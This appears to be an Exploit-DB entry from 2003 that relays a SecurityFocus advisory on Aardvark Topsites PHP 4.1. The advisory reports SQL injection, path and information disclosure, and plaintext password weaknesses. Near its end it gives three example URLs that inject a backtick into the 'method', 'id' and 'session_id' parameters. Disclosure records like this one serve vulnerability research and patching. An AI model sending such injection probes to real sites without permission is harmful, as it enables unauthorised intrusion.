Aardvark Topsites 4.1 PHP - Multiple Vulnerabilities

EDB-ID:

23443

CVE:



Author:

JeiAr

Type:

webapps


Platform:

PHP

Date:

2003-12-16


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

source: https://www.securityfocus.com/bid/9231/info

Multiple vulnerabilities have been identified in the software that include information disclosure, path disclosure, SQL injection, and a plaintext password weakness.

Aardvark Topsites PHP version 4.1.0 has been reported to be prone to these issue, however other versions may be affected as well.

http://www.example.com/index.php?method=`
http://www.example.com/index.php?a=lostpw&set=1&id=`
http://www.example.com/index.php?a=lostpw&set=1&session_id=`